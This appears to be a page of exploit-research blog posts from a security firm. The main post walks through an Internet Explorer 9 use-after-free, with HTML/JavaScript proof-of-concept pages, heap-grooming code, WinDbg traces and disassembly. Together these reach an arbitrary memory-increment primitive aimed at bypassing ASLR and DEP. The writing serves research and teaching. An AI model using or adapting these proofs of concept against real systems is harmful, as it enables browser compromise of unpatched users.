Cisco has issued a fix to address CVE-2016-1287. The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server. It is advertised as “the industry’s most deployed stateful firewall.” When deployed as a VPN, the device is accessible from the Internet and provides access to a company’s internal networks. Continue reading

Silver Bullets and Fairy Tails

Introduction

This week we made mention on Twitter of a zero-day vulnerability we’ve unearthed that affects the popular Tails operating system. As the Tails website states:

Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent censorship;
all connections to the Internet are forced to go through the Tor network;
leave no trace on the computer you are using unless you ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.”

This software was largely popularized due to the fact that it was used by whistleblower Edward Snowden. Since then, the OS has garnered much attention and use by a wide range of those seeking anonymity on the Internet. Continue reading

A browser is only as strong as its weakest byte – Part 2

As promised, the follow up from our previous post.

Before Thanksgiving, we left off with IE9 coughing up bytes. We’ll poke it some more today and make it do a little dance for us.
Last week we managed to trick IE9 into doing an INC[ADDRESS] for us where we could specify the address. Now it is time to see how much damage we can do with just that. Since we’ll operate under the assumption that everything in the process is ASLR’d the first thing to do to is come up with a way to predict a fixed address we can safely increment. The easiest way to do that will be using an aligned heapspray. In case you’re not familiar with heapspraying, especially heap spraying in Internet Explorer, below is a quick breakdown of the basics of a heapspray. Continue reading

A browser is only as strong as its weakest byte

Back in September, FireEye posted a blog entry discussing CVE-2013-3147, a vulnerability in Microsoft Internet Explorer. They pointed out that Microsoft patched the issue on July 9th in Bulletin MS13-055. While reading their post it dawned on me that I had discovered a similar issue as far back as January this year. The usage of the onbeforeeditfocus event was what caught my attention, and upon installing the aforementioned patch from Microsoft, I confirmed that they silently fixed my bug, too. As we at Exodus had been shipping an exploit to our customers for this issue since January, we figured an adequate amount has time has passed and we can now share some details here on our blog.

The vulnerability we discovered was also an use-after-free vulnerability (as is often the case with browser issues) that involved event handlers and some other miscellaneous Javascript constructs. The exploit I wrote bypassed ASLR through a forced memory disclosure and Data Execution Prevention through the usual ROP chain trickery. The actual exploit is non-trivial, so bear with me with me and expect some minimal shortcuts to be taken in the following explanation.

The Crash

First of all, lets dump a poc that causes the crash:

<!doctype html>
<HTML>
  <head>
    <script>
      function setinput() {
        try { document.write('Timber'); } catch(e) {}
      }
      function loaded() {
        document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
        document.getElementsByTagName('input')[0].focus();
      }
    </script>
  </head>
  <body onload="loaded();">
    <input value="mydata" type="text"></input>
  </body>
</html>

If you open this file in Internet Explorer 9 (from a website, not as a local file) you might get a crash that looks like this:

This exception may be expected and handled.
eax=00000001 ebx=00000000 ecx=00000010 edx=0000006a esi=00000000 edi=00000000
eip=71e0e0d0 esp=0327cb8c ebp=0327cb98 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CHTMLEditor::FireOnSelectionChange+0xb:
71e0e0d0 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000010=????????
1:019> ub
MSHTML!CSelectionManager::EndSelectionChange+0x8e:
71e0e0c4 90              nop
MSHTML!CHTMLEditor::FireOnSelectionChange:
71e0e0c5 8bff            mov     edi,edi
71e0e0c7 55              push    ebp
71e0e0c8 8bec            mov     ebp,esp
71e0e0ca 51              push    ecx
71e0e0cb 51              push    ecx
71e0e0cc 53              push    ebx
71e0e0cd 8d4f10          lea     ecx,[edi+10h]

This might look like it is a NULL-pointer dereference: edi == NULL; ecx gets set to edi + 0x10; and then ecx is dereferenced. Since, as far as I know, NULL pointer dereference vulnerabilities are not exploitable in Internet Explorer this does not look useful. But this is not the actual crash, and to see where things first go wrong we simply turn on pageheap and user mode stack trace database for iexplore.exe.

gflags.exe /i iexplore.exe +hpa +ust
Current Registry Settings for iexplore.exe executable are: 02001000
    ust - Create user mode stack trace database
    hpa - Enable page heap

Running the poc again gives us the following information:

(87c.fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00008000 ebx=0e62afd8 ecx=7746389a edx=02bb10d0 esi=ffffffff edi=0ed3af38
eip=71e43f37 esp=08c9caa0 ebp=08c9cab8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e43f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:0ed3af70=????????

1:019> lmi vm mshtml
    File version:     9.0.8112.16446

1:021> k
ChildEBP RetAddr
08c9cab8 71e43ed1 MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52
08c9cacc 71e43e85 MSHTML!CSelectionManager::ShouldElementShowUIActiveBorder+0x2e
08c9cae4 71e4308f MSHTML!CSelectionManager::SetEditContext+0xdf
08c9cb50 71cce2fd MSHTML!CSelectionManager::SetEditContextFromElement+0x34e
08c9cb90 71ccdb7d MSHTML!CSelectionManager::SetEditContextFromCurrencyChange+0x2d6
08c9cbb8 71ef200f MSHTML!CSelectionManager::Notify+0x1e0
08c9cbcc 71ef1fc2 MSHTML!CHTMLEditor::Notify+0x5a
08c9cbe8 71ccce15 MSHTML!CHTMLEditorProxy::Notify+0x21
08c9ccd0 71d9a7a4 MSHTML!CDoc::SetCurrentElem+0x525
08c9cd2c 71ccdef8 MSHTML!CElement::BecomeCurrent+0x1d6
08c9cd60 71c51018 MSHTML!CElement::focusHelperInternal+0x109
08c9cd78 710d85fe MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x58
08c9cdac 71116402 jscript9!Js::JavascriptFunction::CallFunction+0xc4
08c9ce00 08d804da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117
WARNING: Frame IP not in any known module. Following frames may be wrong.
08c9ce58 710d85fe 0x8d804da
08c9ce94 710d8523 jscript9!Js::JavascriptFunction::CallFunction+0xc4
08c9cef8 710d845a jscript9!Js::JavascriptFunction::CallRootFunction+0xb6
08c9cf34 710d83e6 jscript9!ScriptSite::CallRootFunction+0x4f
08c9cf5c 71119c8d jscript9!ScriptSite::Execute+0x63
08c9cfc0 71df27b9 jscript9!ScriptEngine::Execute+0x11a
08c9d044 71df26e3 MSHTML!CListenerDispatch::InvokeVar+0x12a
08c9d064 71e4d050 MSHTML!CListenerDispatch::Invoke+0x40
08c9d0e8 71d4e894 MSHTML!CEventMgr::_InvokeListeners+0x187
08c9d110 71e4d147 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc
08c9d2d4 71edc03c MSHTML!CEventMgr::Dispatch+0x3cc
08c9d2fc 71df2ab0 MSHTML!CEventMgr::DispatchEvent+0xc9
08c9d330 71dc4062 MSHTML!COmWindowProxy::Fire_onload+0x123
08c9d394 71dc3c7a MSHTML!CMarkup::OnLoadStatusDone+0x5eb
08c9d3b4 71dc3c6f MSHTML!CMarkup::OnLoadStatus+0xb6
08c9d804 71d2ffbc MSHTML!CProgSink::DoUpdate+0x5dc
08c9d814 71eaa339 MSHTML!CProgSink::OnMethodCall+0x12
08c9d850 71ec9ba0 MSHTML!GlobalWndOnMethodCall+0x115

1:020> ub
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x36:
call    MSHTML!EdUtil::FireOnEvent
mov     dword ptr [ebp-8],eax
shl     eax,0Fh

I wont be going into the details and root cause analysis for this crash but will mainly focus exploitation, but the main concept is that the body.onload() function triggers the onbeforeeditfocus handler to be called and the function apparently deletes some important data that causes a crash once we return from the ‘FireOnEvent’ function.

Unfortunately the VM I’m playing on has an windbg version that sometimes fails the user stack trace lookup, so I cannot show you that trace at this point. I can tell you the size of the allocation however, thanks to Fermin’s subtraction technique:

1:019> .printf "size is 0x%x", 1000 - edi & 0xFFF
size is 0xc8

So we know we are freeing a size 0xC8 piece of memory that contains some data that is being reused later on. Time to assess the exploitability of this issue, and mainly the exploitability when running with full process ASLR (no cheating as many public exploits these days seem to do).

First off all we need to check if we can replace the freed memory with our own data. Thanks to the Low Fragmentation Heap (LFH) this is pretty easy, by simply allocating 0xC8 bytes after the document.write() call we should re-occupy the last freed slot of 0xC8 sized memory. To make sure this allocation size uses the LFH allocator we make a few allocation of this size before we start the whole fun.

Setting a breakpoint at the initial crash location allows us to inspect our progress (don’t forget to turn off PageHeap to make sure the LFH allocator will be activated).

Actually, if at this point you want to stop reading and try to create the exploit yourself, go ahead and do so as spoilers are on the way.

Control

Back to the progress: taking control over freed memory:

<!doctype html>
<HTML>
  <head>
    <script>

      lfh = new Array(20);
      for(i = 0; i < lfh.length; i++) {
        lfh[i] = document.createElement('div');
        lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
      }

      function setinput() {
        try { document.write('Timber'); } catch(e) {}
        d = document.createElement('div');
        d.className = "uFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFF";
      }

      function loaded() {
        document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
        document.getElementsByTagName('input')[0].focus();
      }
    </script>
  </head>
  <body onload="loaded();">
    <input value="mydata" type="text"></input>
  </body>
</html>

Lets run this and watch the effects:

1:019> bp !mshtml + 0x383f37  ".printf "AFTER FireOnEvent : edi %p", edi; .echo; dc edi L0xc8/4;.echo;"
AFTER FireOnEvent : edi 1072a440
1072a440  71eb2d04 71eb320c 00000002 106f4920  .-.q.2.q.... Io.
1072a450  106eff10 106eff38 107309a0 00000000  ..n.8.n...s.....
1072a460  107308e0 00000000 00000000 0000000f  ..s.............
1072a470  00000001 00000000 00908002 00000000  ................
1072a480  00000000 00000000 00000000 00000000  ................
1072a490  106c3dc0 00000000 ffffffff 00000000  .=l.............
1072a4a0  00000000 00000000 00000000 00000000  ................
1072a4b0  00000000 107309a0 00000000 00000000  ......s.........
1072a4c0  00000000 106c3dc0 1072cd88 1072ce40  .....=l...r.@.r.
1072a4d0  00000000 106efe20 106efe48 106efe70  .... .n.H.n.p.n.
1072a4e0  106efe98 106efec0 106efee8 00000000  ..n...n...n.....
1072a4f0  00000000 00000000 00000000 00000000  ................
1072a500  00000000 00000000                    ........

eax=00008000 ebx=107309a0 ecx=00000000 edx=00000001 esi=ffffffff edi=1072a440
eip=71e03f37 esp=1330cca8 ebp=1330ccc0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e03f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:1072a478=02809000
1:019> g
AFTER FireOnEvent : edi 1072a440
1072a440  ffffffff ffffffff ffffffff ffffffff  ................
1072a450  ffffffff ffffffff ffffffff ffffffff  ................
1072a460  ffffffff ffffffff ffffffff ffffffff  ................
1072a470  ffffffff ffffffff ffffffff ffffffff  ................
1072a480  ffffffff ffffffff ffffffff ffffffff  ................
1072a490  ffffffff ffffffff ffffffff ffffffff  ................
1072a4a0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4b0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4c0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4d0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4e0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4f0  ffffffff ffffffff ffffffff ffffffff  ................
1072a500  ffffffff 0000ffff                    ........

eax=00008000 ebx=10730a60 ecx=0000005d edx=0000005c esi=ffffffff edi=1072a440
eip=71e03f37 esp=1330c960 ebp=1330c978 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e03f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:1072a478=ffffffff

As can be seen we have successfully taken over the freed memory allocation (the breakpoint hits twice and the 2nd time is when it was originally freed memory) and are now operating on data under our control. Next question is: “What now?”. First of all this does not seem to be one of those easy ‘control virtual function table and then control program flow’ style use-after-frees. At this point you should probably dig deeper and look into what the object/memory is supposed to be before it is freed to gain more insight and what route to take toward exploitation, but we wont do that to spare you some reading and me a lot of typing. It is also possible to create different types of crashes that might give you faster vftable control, but we’ll be working with this version since it allows us to do funny things.

We will start to just look at the function at the point of the crash and work from them under the assumption that we control the memory in [edi]. Opening the crash location and selecting ‘edi’ at the crash point shows us that edi comes from eax at the beginning of the function.

1-edi-assigned

We also see that the result of the ‘EdUtil::FireOnEvent’ call is used to determine a jump at the end of the basic block:

2-eax-jnz

The result of the function is ‘1’ resulting in the the jnz not being taken and the function ending shortly after that without using the freed data again. Of course, you really need to dig into the function and find out why it returns 1 and not 0 which gives you much more exploitation flexibility, but again: shortcut time, we’re not doing that here.

3-jnz-to-retn

We’ll need to go up a few function to find a place where the freed memory is being accessed again. You can use the call stack or code cross references in IDA to do that, or step through it in WinDBG, whichever you prefer. You should be able to figure out that in “MSHTML!CSelectionManager::SetEditContext+0xf2:” the memory is used again, but nothing thereabouts seems to be too useful:


71e03e93 836738f7        and     dword ptr [edi+38h],0FFFFFFF7h ds:002b:0083b968=ffffffff

Tracing further will tell you that you’ve ended up inside CSelectionManager::EndSelectionChange with controlled memory being set to eax just before the call:

4-Call-EndSelection

This is where things get interesting. If you need a break from my ramblings I suggest you take a look at the function, assuming that you can control the data in eax at the beginning of the function and find an interesting path through to the epilogue. When working in a fully-ASLRed process there are a few ways that I can currently think of that will not crash:

  1. Replace freed objects with other objects so virtual calls are correctly resolved into a module
  2. Avoid any and all virtual function calls
  3. use USER_SHARE_DATA to call LdrHotPatchRoutine

I have created a PNG of the whole function by taking a few screenshots and pasting them together in a graphics editor, mspaint.exe (there are probably better approaches to that but, hey, this worked). Use right click: open in new tab/window if your screen size isn’t big enough to read it when you click it normally.

5-Full-EndSelection

I highlighted ‘esi’ in the function since that is the register that points to our data. The thing that caught my eye when I was looking at this was the following code:

.text:63904388 loc_63904388:                           ; CODE XREF: CSelectionManager::EndSelectionChange(int)-22579Fj
.text:63904388                 mov     esi, [esi+0Ch]
.text:6390438B                 test    eax, eax
.text:6390438D                 jnz     loc_6378E064
.text:63904393                 inc     dword ptr [esi+0A0h]
.text:63904399                 jmp     loc_639B2DD2

If we can reach that block without crashing and with eax set to the correct value (0x0) we can INCrement whatever memory address that we want. This seems somewhat limited but we’ll get back to that later. First lets try to reach that block and once we reach the problematic situation we can worry about actual pursuit of exploitation.

If we slowly step through the function we will see what values we need to have in our controlled memory to be able to reach the code without crashing. If you at this point are working with a non-ASLR library you want to take a different path that leads to a virtual function table call with the pointer under your control, but that’s not what we are after.

Stepping through the function show us:

.text:639B2DAE                 dec     dword ptr [esi+90h]
.text:639B2DB4                 mov     eax, [esi+90h]
...
.text:639B2DC3                 test    eax, eax
.text:639B2DC5                 short loc_639B2DD2
[esi+0x90] should be 0x1 at the beginning.

.text:6390282A loc_6390282A:                           ; CODE XREF: CSelectionManager::EndSelectionChange(int)+15j
.text:6390282A                 shl     ecx, 4
.text:6390282D                 xor     ecx, [esi+3Ch]
.text:63902830                 and     ecx, 10h
.text:63902833                 xor     [esi+3Ch], ecx
.text:63902836                 jmp     loc_639B2DC3
.
.
.
.text:639B2DC7                 mov     eax, [esi+3Ch]
.text:639B2DCA                 test    al, 10h
.text:639B2DCC                 jnz     loc_63904352
[esi+0x3C] need to pass some test for 0x10, so we’ll just poke at that until it complies.

The block of code we want to reach requires eax to be 0x0 to take the right jump. For this to happen we need to trace back where eax is being set and figure out which path we need to walk to get there. There are two places right above the block we want to reach that can set eax:

loc_6378D607:
mov     eax, edi

and

.text:6390437C                 test    byte ptr [esi+3Ch], 2
.text:63904380                 jnz     loc_6378D607
.text:63904386                 xor     eax, eax

A little inspection show that edi will be non zero at the point where edi is moved to eax, so the only route we can take is the ‘xor eax, eax’ path. To reach this we need to survive through additional functions:
CSelectionManager::GetTrackerType‘ and ‘CSelectionManager::ShouldCaretBeInteractive‘ and both need to return the right return values. This can be achieved without too much hassle.

CSelectionManager::GetTrackerType should return either 1 or 2 which can be achieved by having our data + 0x50 point to memory where at offset 0xC you can find the value 0x1 or 0x2:

6-CTrackerType

The other function: CSelectionManager::ShouldCaretBeInteractive, is a little bit more complex, but can also be navigated through without the process crashing. I will not sit you through that but instead will point out that you can find a value of 0x1 inside the USER_SHARE_DATA at a 0x7ffe0240. I think it’s about time to test a proof of concept that will allow us to INC dword ptr [0xCONTROLLED] and then go from there.

To do this we need to be able allocate an 0xC8-sized piece of memory and fill it with data under our control including values of u0000 (we need 0x1 at offset +0x90). The element.className trick we used in our previous sample wont cut it since the string will terminate at the first u0000 it encounters. There are however plenty more way to have some fun with the heap in Internet Explorer 9. One of the tricks I like to use consists of the following lines of code:

a = document.createElement('area');
a.shape = 'poly';
a.coords = '1,2,3,4,5,6,7,8,9,10';

This snippet creates an AREA element, set its shape to be a polygon and then assigns a list of points (x,y) to its ‘coord’ property. This results in an allocation that consists of:
[NUMBER_OF_POINTS][X][Y][X][Y] …. with all the values converted to hex double words. Using this we do not control the first 4 bytes of the allocation but we’ll be able to easily control the rest and set it to values we want. This results in the proof of concept shown below:

<!doctype html>
<HTML>
	<head>
		<script>
			lfh = new Array(20);
			for(i = 0; i < lfh.length; i++) {
				lfh[i] = document.createElement('div');
				lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
			}

			function setinput() {
				try { document.write('Timber'); } catch(e) {}
				d = document.createElement('area');
				d.shape = "poly"
				d.coords = "1,2,606348324,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
			}

			function loaded() {
				document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
				document.getElementsByTagName('input')[0].focus();
			}
		</script>
	</head>
	<body onload="loaded();">
		<input value="ExodusIntel" type="text"></input>
	</body>
</html>

This cause the following crash in IE:

(638.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=131ec89c edx=00000033 esi=24242424 edi=00000001
eip=71e04393 esp=131ec8a0 ebp=131ec8d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CSelectionManager::EndSelectionChange+0x87:
71e04393 ff86a0000000    inc     dword ptr [esi+0A0h] ds:002b:242424c4=????????

So there you have it, our exploit primitive allows us to INCrement data at a single 4 byte address of our choosing. Is that enough to

  1. Force a memory disclosure needed to bypass ASLR
  2. Control the flow of the execution with enough control to bypass DEP

The answer is of course Yes, otherwise I wouldn’t be writing this blog. As a matter of fact, I found two somewhat distinct ways to do this.

And…. my time is up for this week. I will write the follow up with at least one exploit and publish it next week after Thanksgiving, anyone who sends me either a workable idea, or even better, an actual working exploit will get a shoutout in Part 2.

A few notes on the exploit I wrote:

  • Due to the requirements our memory replacement has (size 0xC8, some specific values at certain offsets) we’re almost certainly stuck with a ‘fixed’ address as the memory address we can INC. Feel free to add a heapspray if you need.
  • We will only trigger the ‘crash’ once and thus the initial exploit primitive of INC[memory] will be used for both a memory disclosure followed by process control.

To be continued….